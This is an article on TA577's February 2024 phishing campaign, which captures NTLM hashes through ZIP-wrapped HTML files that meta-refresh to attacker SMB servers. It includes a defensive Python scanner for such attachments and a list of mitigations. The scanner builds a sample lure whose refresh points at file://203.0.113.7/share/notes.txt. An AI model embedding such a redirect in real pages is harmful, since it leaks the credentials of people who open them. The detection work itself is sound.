TA577 Changes Tactics: NTLM Hashes Now Targeted

The cybersecurity firm Proofpoint has observed that the threat group it tracks as TA577 has changed tactics. The group is now sending phishing emails designed to capture NT LAN Manager (NTLM) authentication hashes from recipients' Windows machines, which the attackers can later use for account takeover.

Specifically, in two waves on 26 and 27 February 2024, the group sent thousands of emails to hundreds of organizations worldwide with the aim of stealing employees' NTLM hashes.

NTLM is used in Windows for authentication and session security. What an attacker-controlled server captures when a Windows host authenticates to it is the NTLMv2 challenge-response (often called a Net-NTLMv2 hash) together with the domain, username and workstation name carried in the NTLM messages. Attackers can crack that material offline to recover the password, or relay it to other services that accept NTLM to authenticate as the victim without ever knowing the plaintext password. Note that a hash is cracked, not decrypted, and that "Pass-the-Hash" in the strict sense requires the NT hash itself, which this kind of capture does not yield; a captured challenge-response is relayed or cracked instead.

Observed packet capture (PCAP) from the TA577 campaign

The lure is a phishing email sent as a reply to an existing conversation the victim took part in, a technique known as thread hijacking. Each email carries a ZIP archive unique to that recipient, and the archive contains an HTML file. The HTML file uses a meta refresh tag (http-equiv="refresh") to redirect automatically to a text file hosted on an attacker-controlled SMB server. When the Windows host follows the redirect it opens an SMB session to that server and authenticates, handing the attacker the NTLM challenge-response without any further user interaction.
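To make the attachment pattern concrete, here is an added detection example written for this page; it is not code from Proofpoint or from the campaign itself. It unpacks a ZIP in memory, finds HTML members, parses the targets of their meta refresh tags, and flags any target that points at a file:, smb: or UNC (\\host\share) location, which is what makes a Windows host start an SMB session. The sample archive, its member names and the host 203.0.113.7 are constructed for the example; the code only parses the HTML and never follows the redirect.

```python
import io
import re
import zipfile
from html.parser import HTMLParser

# Redirect targets that make a Windows host open an SMB session and
# authenticate with NTLM. Assumption: file:, smb: and UNC (\\host\share)
# forms cover the lure style described above; extend if you see variants.
SMB_TARGET = re.compile(r"^(?:file:|smb:|\\\\)", re.IGNORECASE)
# The url= part of a refresh content attribute, e.g. content="0; url=..."
URL_IN_CONTENT = re.compile(r"url\s*=\s*['\"]?([^'\"]+)", re.IGNORECASE)


class MetaRefreshParser(HTMLParser):
    """Collect the url= target of every <meta http-equiv="refresh"> tag."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":  # HTMLParser lowercases tag and attribute names
            return
        attr = {name: (value or "") for name, value in attrs}
        if attr.get("http-equiv", "").strip().lower() != "refresh":
            return
        match = URL_IN_CONTENT.search(attr.get("content", ""))
        if match:
            self.targets.append(match.group(1).strip())


def refresh_targets(html):
    """Return the list of meta refresh targets found in an HTML document."""
    parser = MetaRefreshParser()
    parser.feed(html)
    parser.close()
    return parser.targets


def is_smb_target(url):
    """True if following this target from Windows would cause SMB authentication."""
    return bool(SMB_TARGET.match(url.strip()))


def scan_zip(zip_bytes):
    """Return [(member name, target)] for HTML members whose meta refresh
    points at an SMB-style location. Non-HTML members are ignored."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith((".htm", ".html")):
                continue
            html = archive.read(name).decode("utf-8", errors="replace")
            for target in refresh_targets(html):
                if is_smb_target(target):
                    findings.append((name, target))
    return findings


def build_sample_zip():
    """Constructed sample archive (not a real TA577 artifact). The host
    203.0.113.7 is a documentation address and is never contacted."""
    lure = ('<html><head><meta http-equiv="refresh" '
            'content="0; url=file://203.0.113.7/share/notes.txt"></head>'
            '<body>Loading document...</body></html>')
    benign = ('<html><head><meta http-equiv="refresh" '
              'content="5; URL=https://www.example.com/"></head>'
              '<body>Redirecting...</body></html>')
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("Re_ invoice 4411.html", lure)
        archive.writestr("readme.html", benign)
        archive.writestr("logo.png", b"\x89PNG not really an image")
    return buffer.getvalue()


if __name__ == "__main__":
    for member, target in scan_zip(build_sample_zip()):
        print(f"ALERT: {member!r} meta-refreshes to {target}")
```

The benign member redirects over HTTPS and is left alone; only the member whose refresh target begins with file: is reported. In a mail gateway you would run scan_zip over each attachment and quarantine on any finding; the regexes are deliberately loose about whitespace, quoting and case because the tag is attacker-controlled and the page's own description (an archive wrapping an HTML file) is the stable part of the pattern.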

Proofpoint notes that the HTML files were wrapped in archives to get past protections added to email clients in updates released after July 2023. It also stresses that the objective of this campaign was specifically to capture NTLM hashes, not to deliver malware.

The researchers note that using the stolen hashes in follow-on network attacks would require the targeted accounts not to be protected by multi-factor authentication (MFA). They also suggest the theft may serve as reconnaissance to identify valuable targets: the NTLM exchange tells the attacker which domain, account and workstation responded, confirming a live recipient and where they sit in the organization.

Recommended mitigations include configuring inbound email filtering to block messages whose archives contain HTML files, and blocking outbound SMB (typically TCP ports 445 and 139) at the firewall so that hosts cannot authenticate to SMB servers on the internet. Blocking SMB alone is not a complete fix: if the WebClient service is running, Windows can fall back to WebDAV over HTTP for the same path and still send NTLM credentials, so that service should be disabled where it is not needed. For Windows 11, Microsoft has added a security setting that blocks NTLM authentication on outbound SMB connections, which stops this class of attack at the client.